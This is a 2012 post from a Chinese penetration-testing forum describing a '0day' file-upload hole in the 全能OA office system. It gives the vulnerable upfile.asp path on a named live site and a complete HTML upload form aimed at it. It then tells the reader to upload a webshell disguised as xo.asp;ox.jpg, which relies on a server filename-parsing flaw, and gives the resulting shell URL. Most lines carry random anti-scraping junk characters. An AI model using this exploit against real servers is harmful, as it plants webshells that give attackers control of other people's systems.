中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]
作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
  g  u6 ]5 q$ ]# c; y" F! @) S1 M+ W- i' d* T8 p5 G- ^
系统介绍:
  n( z# ?6 y! X2 N) T
5 f4 \& _9 U" K3 H* z' [, J! K  M全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。% n! h) s# b+ j  |) E0 o  c  B
: l4 }1 R. @/ S0 V+ a/ _$ Y2 @; Q
主要功能:
7 Y, ~" v6 s* M, X公司通告
$ J: ?6 s. p+ _! @7 S工作计划 1 H8 G# p' J. A
通讯助理
* S. T+ u. G! {客户资源
& f/ ?" d5 R2 B$ [我的公文
; z! {) X( P$ q; g+ q$ ]公文传阅 $ U/ [1 I% P( @( y
公共资源
& z3 f9 h- i& j. |资源预约
5 u  s6 g: `5 o, c今日考勤
6 k( q7 u( j* S  [( ^个人计划
- u& y1 A' V  A$ ^" f/ ~: d/ r6 {个人通讯录 ; x; f0 t) e" ]) {2 Q1 J, M% ~! |
个人基本档案 " |% \& \0 _" F, I, y
未读邮件
2 I* s8 k: E0 T发邮件
+ A, ]/ }0 ]$ r1 Y: K0 x& ?0 \9 p& {8 H: `收件夹
' I) t6 F- M. V寄件夹 ( z4 T3 \0 K; y+ r
网络硬盘
2 @1 E0 t  F, T0 x2 z! G+ U网络会议
  ~0 [' H" J& C# }0 T" p网络调查 ) m! _) i3 ^3 V0 Z7 m/ R1 d' C  g
交流论坛4 u9 L3 n/ A# T/ E

3 F, x. |$ u8 j. B) R有兴趣测试的朋友可以下源码看看
. w6 O# i4 Q1 Z" C
+ A. P1 a, L: p3 n源码下载:
+ G) e( u# x' ~; L8 k
8 D0 T7 n& x# Vhttp://www.mycodes.net/30/4750.htm
$ A1 f, R% ^2 A& t: ~  r! S) @1 a7 n
漏洞介绍:
  [$ |- p2 V8 R- a) l" _% a' O2 H8 S. A
由upfile.asp上传文件漏洞引起
1 _3 ~8 h4 x/ a) t
: e) x8 F6 ^+ |# j测试方法:' w4 l4 v4 Y5 L% k! ?& l

$ C$ p' G5 E$ s4 z使用名小子上传http://www.itlynn.com/upfile.asp即可# @: C+ v& F5 ?8 u
2 Q4 _7 j( j! h1 f
如果upfile.asp文件被删除不存在。
2 X$ j3 k; q8 m: ?' H/ S2 r7 P$ y# N7 U& t; G# \/ ~$ h! E- M, X
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp. k; D" N! \! u- k5 x
* ~% [# E" F8 p+ w* M9 R1 D
如果存在那么将如下代码保存为upfile.html。0 G' E7 Q% z8 X! m
: Q: q1 f3 G; N
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp$ D4 |0 {4 {! N# p) c8 [& q, n
% e" l9 d' c$ \/ _% E% T) Z3 o/ F
1 b% S3 v6 \) @! M
% z$ e9 Y# c% C# g0 \
01 <table border='0' align="center" cellpadding="5"> + ]' f' ^5 V4 [3 @5 c- Y

& U, b$ u* r$ r3 h1 z( H02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> & H5 K& G5 U* E1 k2 Q
0 D& l, j6 N+ U$ ^( |
03 <tr> 2 }+ @: r1 i5 [0 v% ?* }

7 p( m$ P, S9 {04             <td>报错:</td>
. }2 p# ]/ W3 B4 y: i4 T- w$ A2 s- z4 e- [
05             <td><input type='radio' name='errnumber' value='0'> % ^" W$ H2 C7 [' \: s5 F/ M
* a8 M9 E  E: g2 X, D
06               自动更名 ) b% U0 a1 `1 S
1 r  |3 _+ k% N- J
07               <input type='radio' name='errnumber' value='1' checked> 0 ^: o0 _7 \! e( Y5 ^0 Z

7 s: O4 C9 j6 d+ ]5 H1 C9 s08               报错方式 ( H* A  P/ V, ~( N

$ I  x% d; \9 K  x6 a9 ^09               <input type='radio' name='errnumber' value='2'> & ]( B8 C, H$ O2 e* L& e

* \' \: b' D/ m+ w9 ^, f10               直接覆盖</td> / D7 v6 m8 z+ Z* o
* C* B( _, ]/ u  N0 P9 M. m7 g
11           </tr> % q/ ~# S" }: X
- ]. ]4 `, Q& p" d' B) C
12           <tr>
8 V4 z6 ~- ]9 j
/ b8 z9 V! T2 Y0 x* k0 x13             <td>主题:</td> 1 n' f& \; i2 w' Q6 |, z1 s
- v$ b) Y' R6 c* j  o9 t9 ^
14             <td><input type='text' name='filename' size='30'></td>
& V8 V2 p" _& W& N" [8 {
4 K2 |$ l+ p0 v15           </tr>
& F# n. E7 N& Y( |- t7 \% n% a0 I( X* H6 E
16           <tr>
4 z( U2 K% h( v6 _9 u- L, X. x+ @, E+ O* N, q
17             <td>文件:</td>
  t& u9 p: H9 N1 K. C3 P0 V- v, A
18             <td><input type="file"name="fruit"size="30"></td> 7 Y2 a+ w; i+ [/ n3 s3 t

' s2 c6 ?9 B, @" L# L' `* p% |19           </tr> # u9 E) F+ Q4 x, a( ~+ n5 ]2 J

! {- {3 D7 n6 ?* i3 O( r20           <tr>
) a1 C# q' A  w' C) I  Y
9 F) ~, ], l8 h; b$ j& \21             <td valign='top'>简介:</td>
6 H& H7 b9 y3 ], s6 [9 h+ m7 d4 P4 e- _2 [1 _
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 4 y4 A8 t* F6 ^& t6 o: t5 L. U
# Y2 N# h+ B) K0 }4 Q
23           </tr> 4 R/ `; w  |" ^6 _

0 \& S* P0 R& E* K24   & ~: ^( N, J: z

5 W, q$ W: u" B$ e& s* F: C: K  k* p25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> # t5 }' ^: T" u: l. K

$ z9 M) M4 i' ?7 U26           </tr>
, R, _$ n2 ]/ V
4 M- e; _+ c8 N6 h7 {2 r0 _27         </form> 4 {7 k+ y" n8 n( H" h4 I

# o. ~9 ^) z4 f; ^) A- U6 H然后打开上传一个文件名为xo.asp;ox.jpg的文件。0 A" p, D- m( m( V$ T

9 _6 `8 M- o$ c3 v: i; C4 Z
! z1 A6 E' K3 k) i" y- _4 y# d. p, c7 \9 k" E' J
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
& n( D0 W& ^0 t6 [
0 l1 G) G! L2 ?& ]/ F1 r2 u; R此漏洞需要配合解析漏洞利用。
( j  e; r; H1 ^7 v
) g$ m- v& G4 Q* y2 R( E



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2